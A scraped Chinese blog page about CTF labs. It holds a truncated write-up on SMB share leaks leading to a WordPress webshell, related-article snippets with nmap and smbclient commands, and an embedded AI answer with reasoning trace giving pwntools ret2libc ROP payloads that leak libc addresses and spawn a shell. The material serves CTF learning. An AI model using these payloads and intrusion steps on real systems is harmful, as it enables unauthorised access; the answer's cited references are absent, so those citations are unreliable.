CTF-SMB信息泄露+利用HTTP攻击

最新推荐文章于 2024-09-13 11:00:07 发布
原创 最新推荐文章于 2024-09-13 11:00:07 发布 · 285 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #http #tcp/ip #linux #web安全

本文介绍了通过SMB协议进行信息收集并利用泄露的凭据登录WordPress后台的过程,最终实现webshell上传及权限提升。

前言——协议介绍

总而言之,就是文件共享用的,平常都建议关闭,445端口懂得都懂。

 

1.首先肯定是扫描端口啦,这次主题是SMB漏洞,那我们就只搞SMB的

 2.根据SMB协议的弱点逐个尝试

(1)先尝试查看一下列表,直接空密码登录,看来这靶机很靶机。。 

(2)再一个个试一下能不能进去,查看可疑的文件

发现一个密码</

最低0.47元/天 解锁文章
CTF之LazySysadmin 靶机渗透(SMB信息泄露
afei001
04-04 549
SMB介绍     SMB (Server Message Block)通信协议是微软(Microsoft) 和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。     SMB 是在会话层(session layer)和表示层(presentation layer)以及小部分应用层(application lay...
CTF夺旗-SMB信息泄露-靶机渗透实战
居上
11-28 1118
SMB信息泄露信息收集服务利用针对SMB尝试空口令登陆针对SMB远程溢出漏洞进行分析针对HTTP协议弱点分析上传WebShell 实验环境 攻击机:192.168.36.128 靶机:192.168.36.138 靶机下载地址 链接:https://pan.baidu.com/s/13L3humuHmHFRu2aqwHatZg 提取码:ox8g 信息收集 nmap -sV {ip} #探测目标的服务以及版本 nmap -A -v -T4 #{-A}扫描所有信息,{-v}屏幕回显,{-T4}以最快线程 服
3-1CTF夺旗入门教程--SMB信息泄露
高冷的宅先生
03-27 499
1.信息探测 扫描探测开放的服务 #开放服务信息 nmap -sV 192.168.2.112 #挖掘全部信息 nmpa -A -v -T4 192.168.2.112 2.分析探测结果 在扫描结果中查找特殊端口 针对SMB协议弱点分析 针对SMB协议,使用空口令、弱口令尝试登录,查看敏感文件,下载查看 smbclient -L 192.168.2.112 smbclient '\\192...
CTF-SMB 信息泄露
su__xiaoyan的博客
12-16 690
实验环境: 攻击者:Kali Linux(192.168.0.243) 靶机:Oracle VM VirtualBox 6.1.10——Ubuntu(32-bit)(192.168.0.242) 实验流程: 实验环境导入方法参考链接: https://blog.youkuaiyun.com/su__xiaoyan/article/details/111143714 启动靶机,信息探测。 检测与靶机的网络连通性 端口探测,服务扫描 命令:nmap -sV 192.168.0.242 通过端口扫描结果,该主机开放了SM
CTF夺旗 SMB信息泄露
qq_43613772的博客
06-02 768
SMB(Server Message Block)通信协议是微软(Microsoft)和英特尔(Intel)在1987年制定的协议,主要是作为Microsoft网络的通讯协议。后来Linux移植了SMB,并称为samba。 实验环境 1、Windows下虚拟机系统kali Linux,用了之后发现kali Linux系统里面的那些小软件特别多。 2、 靶场机器 我们的目的就是获取靶场机器上的fla...
ctf 监听端口_CTF—攻防练习之HTTP—PUT上传漏洞
weixin_39835147的博客
12-31 264
主机:192.168.32.152靶机:192.168.32.159中间件PUT漏洞包括apache,tomcat,IIS等中间件设置支持的HTTP方法(get,post,head,delete,put等)每一个开放了HTTP方法都有其对应功能,PUT方法可以直接从客户机上传文件到服务器,如果中间件开放了HTTP中的PUT方法,那么就可以利用上传webshell到服务器对应目录扫描靶机端口:然后常...
CTF训练笔记(三)- SMB信息泄露
morrino的博客
02-05 1927
大量搜索各种信息,尝试利用各种途径拿到shell进而提权。[CTF训练笔记系列 - 快速导航](https://blog.youkuaiyun.com/morrino/article/details/116036237)
一、CTF-Web-信息泄露(记录CTF学习)
qq_27920699的博客
12-16 3464
个人CTF学习之路
CTF训练 SMB信息泄露(含靶场下载地址)
ZY_Jack的博客
12-07 1324
SMB信息泄露确认ip,挖掘信息针对smb协议弱点探测针对http协议弱点探测构造payload获取shell在wordpress中上传webshell优化终端获得flag 确认ip,挖掘信息 仍然是首先查看ip,通过sudo -i 获取root,然后用netdiscover找到靶机的地址。 靶机的ip是192.168.43.120 因为虚拟机的网络设置选的是桥接模式,所以后面显示的是vmware, Inc。 挖掘开放信息服务:nmap -sV 192.168.43.17 针对smb协议弱点探测 因
SMB协议(ipc$攻击)
cj_Hydra's Blog
02-11 4450
前言: IPC$和windows的SMB共享都是复用了445端口,它们都基于SMB协议实现,但是IPC$的作用范围更大一些,它是服务器间进程间通信方式。 IPC$的登录验证方式可分为: 1:匿名anonymous IPC$: 空账号,空密码可访问,但是匿名IPC$的权限往往较低。 2:非匿名IPC$: 需要帐号密码的验证,不过这反过来也为黑客提供了一种暴力破解windows系统账户密码的方式 3:...
ctf—夺旗赛smb信息泄露
weixin_43803070的博客
07-10 2310
** 一、协议介绍 ** ** 二、信息探测 ** 扫描开放服务: root@kali:~# nmap -sV 192.168.1.109 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-10 10:39 CST Nmap scan report for 192.168.1.109 Host is up (0.0024s late...
CTF Misc(3)流量分析基础以及原理
Ba1_Ma0的博客
10-11 1万+
流量分析基础以及原理
两道CTF流量分析题分享
seek_2022的博客
03-10 3236
本文分享了两道CTF流量分析题,分析的过程充满着许多乐趣,希望本文分享的两道题的分析对大家学习相关技能有帮助。
SMB暴力破解攻击,什么鬼?
热门推荐
三分恶的博客
03-31 2万+
最近在做的项目线上环境是Windows Server,有一天,安全检查的时候发现产环境服务器高危——服务器遭受了SMB暴力破解攻击! 遇到事情不要慌,先发……百度一下。 暴力破解攻击:暴力破解攻击是指攻击者通过系统的组合所有可能性(例如登录时用的账户名.密码),尝试所有的可能性破解用户的账户名.密码等敏感信息,攻击者会经常使用自动化脚本组合出正确的用户名和密码。  暴力破解攻击是一种穷...
BUUCTF-Misc2
lin__ying的博客
03-07 561
发现是流量包,放到Wireshark中分析。
SMB流量分析
欢迎光临
09-13 2581
SMB协议流量主要分为以下几个阶段1、 tcp三次握手2、会话建立(Negotiate Protocol):客户端发送Negotiate Protocol Request ,其中包含客户端支持的smb协议版本列表以及SMB Header信息服务端发送Negotiate Protocol Response,包含服务器选择的协议版本、会话密钥 等3、会话设置(Session Setup)首先进行tcp三次握手。
CTF(三)流量分析
发现新世界的博客
06-06 3204
使用wireshark
流量分析
chanbeng5693的博客
08-02 732
分 析 报 告数据包: LAN SEGMENT属性:IP范围:10.1.75.0/24(10.1.75.0到10.1.75.255)网关IP:10.1.75.1广播IP:10.1.75.255域控制器(DC):PixelShine-DC,10.1.75.4域名:pixelshine.net 需求: 说明这种感染的时间和日期。确定受感染的Windows客户端的IP地址。确定受感染的Win...
实验吧杂项-流量日志分析
Au
09-11 1446
A记录 数据包 题目描述如下: 下载下来是一个cap文件,用wireshark打开,提示文件截断 观察流量发现为无线流量,加上之前的报错,猜测为已加密的数据包 破解加密的无线数据包需要得到数据包的 ESSID 和 PASSWORD 使用Kali集成的aircrack-ng 爆破工具得到ESSID为 0719 加密方式为 WPA加密(脆弱) 加载字典...
ctf-pwn怎么用write+read求libc的基址
最新发布
11-15
<think> 我们参考引用内容,特别是引用[1]到[5],来回答用户关于使用write和read函数在CTF Pwn中求libc基址的方法。 根据引用[4]和[5],我们知道: 1. 程序运行后,libc中的函数在内存中的实际地址 = libc基址 + 函数在libc中的偏移量。 2. 我们可以通过泄露一个已经执行过的函数的实际地址(例如write或puts)来计算libc基址。 在CTF Pwn中,如果程序有栈溢出漏洞,我们可以构造ROP链来调用write函数(或puts函数)来泄露某个函数的真实地址(通常是GOT表中存储的地址),然后通过这个地址减去该函数在libc中的偏移量,得到libc基址。 具体到使用write+read的方法,通常步骤如下: 步骤1:第一次溢出,利用ROP调用write函数,将GOT表中某个函数(如write自身或puts)的地址输出到标准输出(文件描述符1)。同时,为了后续继续利用,我们需要控制程序返回到一个可以再次触发溢出的位置(如main函数开头)。 步骤2:接收程序输出,解析出泄露的函数地址。 步骤3:根据泄露的函数地址,计算libc基址(基址 = 泄露的函数地址 - 该函数在libc中的偏移量)。注意,不同libc版本中函数的偏移量不同,因此需要确定libc版本(可以通过泄露多个函数地址来匹配,或者题目提供了libc文件)。 步骤4:根据libc基址,计算出system函数和字符串"/bin/sh"的地址。 步骤5:第二次溢出,利用ROP调用read函数(或其他输入函数)将构造好的ROP链(调用system("/bin/sh"))写入到某个可写内存区域(如.bss段),然后跳转到该区域执行;或者直接构造ROP链调用system("/bin/sh")。 但是,用户特别提到使用write+read,所以这里重点在于利用write泄露地址和利用read再次读入数据。 以下是一个典型利用场景的伪代码: 第一次ROP链: - 覆盖返回地址为write函数的PLT地址(write@plt) - 设置write函数的参数:文件描述符(1)、要泄露的地址(如write_got,即GOT表中write的地址)、输出的长度(4或8字节,取决于32位还是64位) - 设置返回地址为main函数的地址(或另一个可以再次触发溢出的地址),这样在write执行完后程序会重新运行到有漏洞的地方。 接收程序输出的write_got的值,然后计算libc基址。 第二次ROP链: - 覆盖返回地址为read函数的PLT地址(read@plt) - 设置read函数的参数:文件描述符(0,即标准输入)、存储地址(如.bss段的一个缓冲区)、长度(足够长以容纳我们输入的ROP链) - 设置返回地址为存储的ROP链的起始地址(即.bss段的那个缓冲区),这样read函数读入的数据(即我们构造的ROP链)会从.bss段开始执行。 第二次ROP链中,我们可以在.bss段写入一个ROP链,这个ROP链调用system("/bin/sh")。或者,我们可以利用read函数读入一个ROP链直接调用system("/bin/sh"),但要注意此时需要知道system函数的地址。 另一种常见的做法是:第二次ROP链直接构造调用system("/bin/sh"),而不通过read再次读入。但这里用户要求使用read,所以我们需要用read来读入后续的ROP链或字符串。 具体构造示例(32位): 第一次ROP链: - 填充缓冲区 - write@plt - main_addr (返回地址) - 1 (文件描述符) - write_got (要泄露的地址) - 4 (输出长度) 接收4个字节的write_got地址,计算libc基址:libc_base = write_addr - libc_write_offset 然后计算system地址和/bin/sh地址: system_addr = libc_base + libc_system_offset binsh_addr = libc_base + libc_binsh_offset 第二次ROP链: - 填充缓冲区 - read@plt - system_addr (注意:这里我们希望read后返回到system,并且参数是/bin/sh,但需要调整栈) - 0 (文件描述符) - binsh_addr (读入地址?这里需要调整思路) 实际上,我们通常需要将"/bin/sh"字符串写入内存,如果libc中已经有这个字符串,我们可以直接使用。然后调用system函数。 但是,如果我们使用read读入,我们可以这样: 第二次ROP链1(使用read读入字符串和后续ROP): read(0, bss_addr, len(payload)) # 读入payload到bss_addr 然后返回到bss_addr(即执行我们读入的shellcode或ROP链) 但是,我们也可以直接构造ROP链调用system,此时需要将"/bin/sh"的地址作为参数。我们可以将"/bin/sh"字符串读入到已知地址(如.bss段),然后调用system。 因此,第二次ROP链可以这样: - 覆盖返回地址为read@plt - 设置返回地址为pop指令的地址(用于清理read的参数),然后接着是system的地址和参数 - 参数1:0(标准输入) - 参数2:bss_addr(.bss段的一个地址,用于存放我们输入的字符串"/bin/sh") - 参数3:8(长度,足够存放字符串) - 然后设置返回地址为一段gadget:pop ebx; ret; 这样当read执行完后,会弹出参数(清理栈),然后执行下一条指令。接着我们调用system,参数是bss_addr。 具体构造(32位): payload2 = padding + read_plt + pop3_ret + 0 + bss_addr + 8 + system_addr + ret_addr + bss_addr 解释: - 调用read(0, bss_addr, 8)读入8个字节到bss_addr(这里我们输入"/bin/sh\x00") - read函数返回后,执行pop3_ret(一个弹出3个参数的gadget),将read的参数弹出栈,然后返回到system_addr - system_addr的返回地址是ret_addr(可以是一个无用的ret指令地址),参数是bss_addr(即我们读入的字符串地址) 但是,在64位系统中,参数传递通过寄存器,所以构造方式不同。 由于用户没有指定是32位还是64位,这里我们以32位为例。 然而,在实际题目中,我们往往需要根据题目提供的libc来确定偏移量,或者使用LibcSearcher等工具来查找。 总结步骤: 1. 利用write泄露一个GOT表地址(如write_got)。 2. 计算libc基址(需要知道该函数在libc中的偏移)。 3. 计算system和/bin/sh的地址(需要知道它们在libc中的偏移)。 4. 利用read函数读入字符串"/bin/sh"到.bss段(可选,如果libc中已有则不用读入)。 5. 构造ROP链调用system("/bin/sh")。 注意:如果题目中write函数不可用,也可以用puts函数,但puts遇到'\0'会结束,所以需要小心。 引用[5]中提到了使用LibcSearcher来查找libc版本和偏移,我们可以使用类似的工具。 下面是一个简化的例子(假设是32位程序): 第一次ROP链: payload1 = 'A'*offset + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(4) 然后,接收泄露的write_got地址(4字节),解析为地址。 然后,计算libc_base = write_addr - libc.symbols['write'] # 这里需要知道libc版本,或者使用LibcSearcher 接着,计算system_addr = libc_base + libc.symbols['system'] binsh_addr = libc_base + next(libc.search('/bin/sh')) # 或者如果libc中没有,则需要读入 第二次ROP链: # 首先,我们需要读入"/bin/sh"字符串到.bss段(假设bss_addr已知) payload2 = 'A'*offset payload2 += p32(read_plt) # 调用read payload2 += p32(pop3_ret) # read返回后跳到这里,弹出3个参数 payload2 += p32(0) # fd=0 payload2 += p32(bss_addr) # buf payload2 += p32(8) # len # 然后,我们调用system,参数是bss_addr payload2 += p32(system_addr) payload2 += p32(0) # system的返回地址,可以随意 payload2 += p32(bss_addr) 然后发送payload2,接着发送字符串"/bin/sh\x00"(8字节)。 这样,程序就会执行system("/bin/sh")。 但是,如果libc中已经有"/bin/sh"字符串,我们可以直接使用,不需要读入。那么第二次ROP链可以简化为: payload2 = 'A'*offset + p32(system_addr) + p32(0) + p32(binsh_addr) 然而,用户要求使用read,所以这里我们展示的是需要读入字符串的情况。 注意:实际题目中,我们可能还需要考虑栈平衡等问题。 以上是使用write+read求libc基址并最终获取shell的方法。 现在,我们根据用户要求生成相关问题。 §§相关问题§§ 1. 在32位和64位系统中,利用write和read函数求libc基址的主要区别是什么? 2. 如果程序中没有write函数,还可以用哪些函数来泄露libc基址? 3. 在利用read函数读入数据时,如何确定.bss段的地址? 4. 如何解决不同libc版本中函数偏移量不同的问题? 5. 在构造ROP链时,为什么有时候需要返回到main函数重新开始? </think>### CTF Pwn中使用write+read求libc基址的方法 在CTF Pwn中,通过`write`和`read`函数泄露libc基址是常见的利用技术,主要流程如下: #### 核心原理 1. **libc地址计算** libc基址 = 泄露的函数实际地址 - 该函数在libc中的固定偏移量 即:$libc\_base = leaked\_addr - offset$ 2. **GOT/PLT机制** GOT表存储函数真实地址,通过泄露GOT表项获取libc函数地址(如`write@got`)[^2][^5]。 #### 操作步骤 1. **第一次ROP链(泄露地址)** ```python payload1 = b'A' * offset # 填充缓冲区 payload1 += p64(pop_rdi) # 设置rdi=1 (stdout) payload1 += p64(1) payload1 += p64(pop_rsi) # 设置rsi=write_got payload1 += p64(elf.got['write']) payload1 += p64(pop_rdx) # 设置rdx=8 (64位地址长度) payload1 += p64(8) payload1 += p64(elf.plt['write']) # 调用write(1, write_got, 8) payload1 += p64(main_addr) # 返回main重新触发溢出 ``` - 执行后接收输出的8字节数据,解析为`write`函数的实际内存地址[^5]。 2. **计算libc基址** ```python write_addr = u64(io.recv(8)) # 解析泄露的地址 libc_base = write_addr - libc.sym['write'] # 计算基址 system_addr = libc_base + libc.sym['system'] binsh_addr = libc_base + next(libc.search(b'/bin/sh')) ``` 3. **第二次ROP链(getshell)** ```python payload2 = b'A' * offset payload2 += p64(pop_rdi) payload2 += p64(binsh_addr) # rdi="/bin/sh" payload2 += p64(ret) # 栈对齐(可选) payload2 += p64(system_addr) # 调用system("/bin/sh") ``` #### 关键点说明 1. **`read`函数的作用** - 在限制输入长度的题目中(如[^3]),用`read`构造栈迁移: ```python payload += p64(pop_rdi) + p64(0) # fd=0 (stdin) payload += p64(pop_rsi) + p64(new_stack) # 目标栈地址 payload += p64(elf.plt['read']) # read(0, new_stack, size) payload += p64(migrate_gadget) # 跳转到新栈 ``` - 将后续ROP链读到可控内存区域(如.bss段)[^3]。 2. **动态偏移处理** - 当libc版本未知时,用`LibcSearcher`匹配: ```python from LibcSearcher import * libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') ``` #### 典型应用场景 1. 存在栈溢出但无`system`/`/bin/sh`的程序 2. 开启NX保护时(无法执行shellcode) 3. 输入长度受限需结合栈迁移(如[^3]) ---
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Reaches_r

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值